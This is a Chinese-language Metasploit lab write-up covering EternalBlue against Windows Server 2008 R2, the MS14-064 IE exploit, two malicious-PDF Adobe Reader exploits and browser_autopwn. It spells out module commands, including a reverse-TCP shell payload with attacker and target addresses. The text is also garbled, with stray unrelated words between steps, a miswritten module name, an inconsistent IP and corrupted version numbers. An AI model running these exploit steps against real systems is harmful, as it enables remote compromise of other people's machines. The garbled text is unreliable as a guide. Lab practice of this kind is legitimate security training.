主动攻击:ms17_010_eternalblue
(成功)程序员
ms10_042_helpctr_xss_cmd_exec
(失败)ms4_064_ole_code_execution
(成功)web
adobe_toolbutton
(成功且惟一)adobe_pdf_embedded_exe
(成功)shell
成功应用任何一个辅助模块:browser_autopwn
(成功且惟一)windows
ms17_010_eternalblue
进行主动攻击(靶机:Windows Server 2008 R2 (x64) )首先进入msf的模块目录下,查看可用的exploit
浏览器
use exploit/windows/smb/ms17_010_eternalblue.rb //使用该模块 show payloads //查看载荷 set payload generic/shell_reverse_tcp //使用tcp反弹链接 set LHOST 192.168.245.132 //设置攻击机的IP,即KALI的IP地址 set LPORT 5227 //设置攻击端口 set RHOST 192.168.245.134 //设置靶机IP set target 0 //选择自动目标系统类型
exploit
进行监听攻击ms14_064_ole_code_execution
进行浏览器攻击(靶机:winXP SP3 IE 8)search
命令查找有关浏览器攻击的漏洞use exploit/windows/browser/ms14_064_ole_code_execution info
查看配置信息
服务器
容许的版本
网络
描述
xss
描述:此模块利用Windows OLE自动化阵列漏洞,CVE-2014-6332。已知该漏洞会影响互联网在Windows 95到Windows 10之间的版本11以前的资源管理器3.0,没有Windows XP的补丁。然而,这种攻击只针对因为PowerShell限制,Windows XP和Windows 7框。默认状况下,Windows XP支持vbs,所以它用做攻击向量。在其余较新的Windows系统上,该漏洞将尝试改用PowerShell
设置相关信息
tcp
攻击成功
学习
adobe_toolbutton
进行客户端攻击(成功且惟一)search
命令查找到适合攻击的漏洞use windows/fileformat/adobe_toolbutton info
相关信息
描述
描述:此模块利用Adobe Reader上的“空闲后使用”条件11.0.二、10.1.6和9.5.4及更高版本。脆弱性在处理toolbutton对象时存在,其中回调可用于提早释放对象内存。之后使用对象容许在空闲条件下触发使用。这个模块已在Adobe Reader 11.0.二、10.0.4上成功测试。
进行相关设置,生成PDF文件
kali攻击机打开监听模式
靶机打开PDF文件,攻击成功,得到权限
adobe_pdf_embedded_exe
进行客户端攻击search
命令查找到适合攻击的漏洞use windows/fileformat/adobe_pdf_embedded_exe info
描述:此模块利用智能独立的在版本8.2.4和9.3.4中的glyplets(sing)表处理Adobe阅读器之前的版本也被认为是易受攻击的
生成文件
切换成监听模式
在靶机中打开PDF文件,攻击成功
browser_autopwn
辅助模块(成功且惟一)search auxiliary
查找辅助模块,找到适合的进行运行use auxiliary/server/browser_autopwn info set SRVHOST 172.30.0.189 set SRVPORT 5227 set LHOST 17.30.0.189 run
相关信息
描述
描述:这个模块有三个动做。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,而后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印全部利用Web服务器操做将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同